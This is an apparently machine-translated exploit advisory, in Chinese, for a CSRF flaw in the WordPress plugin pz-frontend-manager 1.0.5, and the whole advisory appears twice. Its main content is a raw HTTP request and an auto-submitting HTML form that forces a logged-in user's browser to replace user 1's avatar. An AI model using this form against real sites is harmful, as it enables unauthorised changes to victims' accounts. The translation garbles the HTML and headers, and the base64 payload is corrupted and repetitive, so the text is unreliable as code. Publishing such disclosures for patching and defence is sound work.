#利用标题: pz-frontend-manager=1.0.5-CSRF更改用户配置文件
图片
#日期: 2024-07-01
#利用作者: vuln Seeker网络安全团队
#供应商homepage3360 https://wordpress.org/plugins/pz-frontend-manager/
#版本:=1.0.5
#在: Firefox上测试
#联系ME: [email protected]
该插件在某些地方没有CSRF检查,这可以允许
攻击者使登录用户通过CSRF攻击执行不必要的动作。
概念证明:
post/wp-admin/admin-ajax.php http/1.1
HOST: LOCALHOST:10003
用户代理: Mozilla/5.0(Macintosh; Intel Mac OS X 10.15; RV:124.0)
壁虎/20100101 Firefox/124.0
content-type:应用程序/x-www-form-urlenCoded; charset=UTF-8
X-重新要求- WITH: XMLHTTPREQUEST
内容长度: 1093
Origin: http://localhost:10003
SEC-GPC: 1
连接:关闭
cookie: cookie
动作=PZFM_UPLOAD_AVATARIMAGGETATA=数据%3AMAGE%2FPNG%3BBASE64%%2civborw0kggoaaaaaaaaaaAdaaaadcaaaaaaaaaaaaaaa3caaaaaaaaacnsi2aaaaaaaaaaaaaaaaaaaaacxbiwxmaaaaaaaaaaaaaaaaaaaaaaaeqbpsbpsri EAAAB6ELEQVR42RVWO46EMAZNADACY3VAOQMXOXCXKZEHS8NPQNXAMW8JXDYRA1ZJHGGE9JHX%2FBY7BYVTL4Y8QN%2BTEJTHJTY6WXUQ0KKKFOM5WJEEEK2BQUFM5WJEEK%2Bxgus2bxgus2Bxgus2Bxgul NED0LAKLNYQ4XV2XB%2FK%2BJXDTS8MC1%2Bulvqehet5fit7hlfsufqfok3d1lj9vo% 2BQN1SFVJM%2BISCB7S3UO8ZVZC8RRSXJIUQP2N0D%2BSXFNBHXCW9CF34YN2L5JYJWN dIprzRfqLpvw0%2B6PCh1fjgxpP5NL4VzlYEa6zOYDgzyvk0cMbykMek6THipSXAD5%2FBKh8H%2F3JGZTxPgM9Px9WDL0CkM1ORJie48nsWAXQ8kW1YxlknKfIWJs%2FEBXgoZ6J f2KMNMYz4FgBJjTGkxR%2FH67vm%2FH8eP9ShlyRqfli24c0svy0zLNXgOkNtQJEle%2FP%2FMPOv8T3TGZIZIbO7sL7BMON74nkuQqUj4XvnMvwiNCBjO%2Byev2NVDtZLeX5rv D9lu0zauxW%2Ba6dBvJ8H5Gyfzz3wIBkO57rYECyHeeWF%2BxW%2BYcT47Jkdzi4TpT%2BlPNdIv9Z34fxNOxf0PhO91yw5MuMen56AxLPOtG7W9T63SCQ2k9Uol1so3bVnrog2JT yU57n1bb37n3s5s8Of5RfsaTdSlfuyUAAAAA8dEVYdGNvbW1lbnQAIEltYWdlIGdlbmVyYXRlZCBieSBHTlUgR2hvc3RzY3JpcHQgKGRldmljZT1wbm1yYXcpCvqLFvMAAABKdEV YDHNPZ25HDHVYZQA4NWUXYWU0YTJMYME3OGVLZDRMZDHMMZDHMGFJZJZJIZNZYWOWUU4NGY1NDK2Y2RLMJBINWENWQ3NNM5Y2JJJMJMJKMJK4YZRHZRHZRHZRHZRHZWJJJJJJJECJECJECJABJGGGGGINGGIG;
CSRF Exploit:
html
身体
表单='http://localhost:10003/wp-admin/admin-ajax.php'
方法='post'
输入类型='隐藏'名称='action'value='pzfm_upload_avatar' /
输入类型='隐藏'名称='imagedata'
value='data:image/png; base64,ivborw0kggoaaaaaaaaaaadcaaaaaaaaaaa3caaaaacnsi2aaaaaaaaaaaaaaaacxbiwxmaaab5aaaaaaaaaaaaaaeqbpsrieaaaab6eleqvr42r42rvwo46emaznadacy3vao QMXOXCXKZEHS8NPQNXAMW8JXDYRA1ZJHGGE9JHX/BY7BYVTL4Y8QN+TEJTY6WXUQ0KKFOM5WJEEEKT1BSIGU+ K+JXDTS8MC1+ULVQEHET5FIT7HLFSUFQFOK3D1LJ9VO+QN1SFVJM+ISCB7S3UO 8ZVZC8RRSXJIUQP2N0D+SXFNBHXCW9CF34YN2L5JYJWNDIPRZRFQLPVW0+6PCH1 fjgxpp5nl4vzlyea6zoydgzyvk0cmbykmek6thipsxad5/bkh8h/bkh8h/3jgztxpgm9px9px9wdl0ckm1orjie48nswaxq8kww1 ykw1yxlknkfiwjs/ebebxgozgozmmmyz6jf2kjjf2kjjjjf2kjjjjjjjf2 kjjf2 kjjjf22k4nmyz4nmymmyz4nmymmyz4nmymmyz4nmyz4nmyz4nmyz4nmyz4nmyz4f KXR/H67VM/H8EP9SHLYRQFLI24C0SVY0ZLNXGOKNTQJELE/P/MPOV8T3TGZIZIBO7SL7BMON7BMON74NKUQQUQQUJ4XVNMVNMVNMVNMVNMVNMVWINMBJO+YEVDTZLEX5TZLEX5TZLEX5TZLEX5RVD9LU0ZAUXEXUX UXB VJ8H5GYFZZ3WIBKO57RYECYHEEWF+XW+YCT47JKDZI4TPT+LPNDIV9Z34FXNOXF0PHO91YW5MUMEN5MUMEN56AXLPOTG7W9T6T6T63SCQ2K9UOL1SO3BVNROG1SO3BVNROG2JTYU57N 3s5s8Of5RfsaTdSlfuyUAAAAA8dEVYdGNvbW1lbnQAIEltYWdlIGdlbmVyYXRlZCBieSBHTlUgR2hvc3RzY3JpcHQgKGRldmljZT1wbm1yYXcpCvqLFvMAAABKdEV ydhnpz25hdhvyzqa4nwuxywu0ytjmyme3ogvlzdrmzdhmmgfjzjzjiznzywowu4ngy1ndk2rlmjbinwq3nmm5y2 y2 y2jjjjmjk4yzrhzrhzrhzwjjjjjjjjjjecj2gagggggggjabjabjabjrgjrggjrgjrgjrgjrgjrgj of unight
/
输入类型='隐藏'名称='userId'值='1'' /
输入类型='提交'value='提交请求' /
/形式
脚本
history.pushstate('','','/');
document.forms [0] .submit();
/脚本
/身体
/html
用户1的个人资料图片将在仪表板中更改
参考:
图片
#日期: 2024-07-01
#利用作者: vuln Seeker网络安全团队
#供应商homepage3360 https://wordpress.org/plugins/pz-frontend-manager/
#版本:=1.0.5
#在: Firefox上测试
#联系ME: [email protected]
该插件在某些地方没有CSRF检查,这可以允许
攻击者使登录用户通过CSRF攻击执行不必要的动作。
概念证明:
post/wp-admin/admin-ajax.php http/1.1
HOST: LOCALHOST:10003
用户代理: Mozilla/5.0(Macintosh; Intel Mac OS X 10.15; RV:124.0)
壁虎/20100101 Firefox/124.0
content-type:应用程序/x-www-form-urlenCoded; charset=UTF-8
X-重新要求- WITH: XMLHTTPREQUEST
内容长度: 1093
Origin: http://localhost:10003
SEC-GPC: 1
连接:关闭
cookie: cookie
动作=PZFM_UPLOAD_AVATARIMAGGETATA=数据%3AMAGE%2FPNG%3BBASE64%%2civborw0kggoaaaaaaaaaaAdaaaadcaaaaaaaaaaaaaaa3caaaaaaaaacnsi2aaaaaaaaaaaaaaaaaaaaacxbiwxmaaaaaaaaaaaaaaaaaaaaaaaeqbpsbpsri EAAAB6ELEQVR42RVWO46EMAZNADACY3VAOQMXOXCXKZEHS8NPQNXAMW8JXDYRA1ZJHGGE9JHX%2FBY7BYVTL4Y8QN%2BTEJTHJTY6WXUQ0KKKFOM5WJEEEK2BQUFM5WJEEK%2Bxgus2bxgus2Bxgus2Bxgul NED0LAKLNYQ4XV2XB%2FK%2BJXDTS8MC1%2Bulvqehet5fit7hlfsufqfok3d1lj9vo% 2BQN1SFVJM%2BISCB7S3UO8ZVZC8RRSXJIUQP2N0D%2BSXFNBHXCW9CF34YN2L5JYJWN dIprzRfqLpvw0%2B6PCh1fjgxpP5NL4VzlYEa6zOYDgzyvk0cMbykMek6THipSXAD5%2FBKh8H%2F3JGZTxPgM9Px9WDL0CkM1ORJie48nsWAXQ8kW1YxlknKfIWJs%2FEBXgoZ6J f2KMNMYz4FgBJjTGkxR%2FH67vm%2FH8eP9ShlyRqfli24c0svy0zLNXgOkNtQJEle%2FP%2FMPOv8T3TGZIZIbO7sL7BMON74nkuQqUj4XvnMvwiNCBjO%2Byev2NVDtZLeX5rv D9lu0zauxW%2Ba6dBvJ8H5Gyfzz3wIBkO57rYECyHeeWF%2BxW%2BYcT47Jkdzi4TpT%2BlPNdIv9Z34fxNOxf0PhO91yw5MuMen56AxLPOtG7W9T63SCQ2k9Uol1so3bVnrog2JT yU57n1bb37n3s5s8Of5RfsaTdSlfuyUAAAAA8dEVYdGNvbW1lbnQAIEltYWdlIGdlbmVyYXRlZCBieSBHTlUgR2hvc3RzY3JpcHQgKGRldmljZT1wbm1yYXcpCvqLFvMAAABKdEV YDHNPZ25HDHVYZQA4NWUXYWU0YTJMYME3OGVLZDRMZDHMMZDHMGFJZJZJIZNZYWOWUU4NGY1NDK2Y2RLMJBINWENWQ3NNM5Y2JJJMJMJKMJK4YZRHZRHZRHZRHZRHZWJJJJJJJECJECJECJABJGGGGGINGGIG;
CSRF Exploit:
html
身体
表单='http://localhost:10003/wp-admin/admin-ajax.php'
方法='post'
输入类型='隐藏'名称='action'value='pzfm_upload_avatar' /
输入类型='隐藏'名称='imagedata'
value='data:image/png; base64,ivborw0kggoaaaaaaaaaaadcaaaaaaaaaaa3caaaaacnsi2aaaaaaaaaaaaaaaacxbiwxmaaab5aaaaaaaaaaaaaaeqbpsrieaaaab6eleqvr42r42rvwo46emaznadacy3vao QMXOXCXKZEHS8NPQNXAMW8JXDYRA1ZJHGGE9JHX/BY7BYVTL4Y8QN+TEJTY6WXUQ0KKFOM5WJEEEKT1BSIGU+ K+JXDTS8MC1+ULVQEHET5FIT7HLFSUFQFOK3D1LJ9VO+QN1SFVJM+ISCB7S3UO 8ZVZC8RRSXJIUQP2N0D+SXFNBHXCW9CF34YN2L5JYJWNDIPRZRFQLPVW0+6PCH1 fjgxpp5nl4vzlyea6zoydgzyvk0cmbykmek6thipsxad5/bkh8h/bkh8h/3jgztxpgm9px9px9wdl0ckm1orjie48nswaxq8kww1 ykw1yxlknkfiwjs/ebebxgozgozmmmyz6jf2kjjf2kjjjjf2kjjjjjjjf2 kjjf2 kjjjf22k4nmyz4nmymmyz4nmymmyz4nmymmyz4nmyz4nmyz4nmyz4nmyz4nmyz4f KXR/H67VM/H8EP9SHLYRQFLI24C0SVY0ZLNXGOKNTQJELE/P/MPOV8T3TGZIZIBO7SL7BMON7BMON74NKUQQUQQUJ4XVNMVNMVNMVNMVNMVNMVWINMBJO+YEVDTZLEX5TZLEX5TZLEX5TZLEX5RVD9LU0ZAUXEXUX UXB VJ8H5GYFZZ3WIBKO57RYECYHEEWF+XW+YCT47JKDZI4TPT+LPNDIV9Z34FXNOXF0PHO91YW5MUMEN5MUMEN56AXLPOTG7W9T6T6T63SCQ2K9UOL1SO3BVNROG1SO3BVNROG2JTYU57N 3s5s8Of5RfsaTdSlfuyUAAAAA8dEVYdGNvbW1lbnQAIEltYWdlIGdlbmVyYXRlZCBieSBHTlUgR2hvc3RzY3JpcHQgKGRldmljZT1wbm1yYXcpCvqLFvMAAABKdEV ydhnpz25hdhvyzqa4nwuxywu0ytjmyme3ogvlzdrmzdhmmgfjzjzjiznzywowu4ngy1ndk2rlmjbinwq3nmm5y2 y2 y2jjjjmjk4yzrhzrhzrhzwjjjjjjjjjjecj2gagggggggjabjabjabjrgjrggjrgjrgjrgjrgjrgj of unight
/
输入类型='隐藏'名称='userId'值='1'' /
输入类型='提交'value='提交请求' /
/形式
脚本
history.pushstate('','','/');
document.forms [0] .submit();
/脚本
/身体
/html
用户1的个人资料图片将在仪表板中更改
正在加载...
localhost
正在加载...
wpscan.com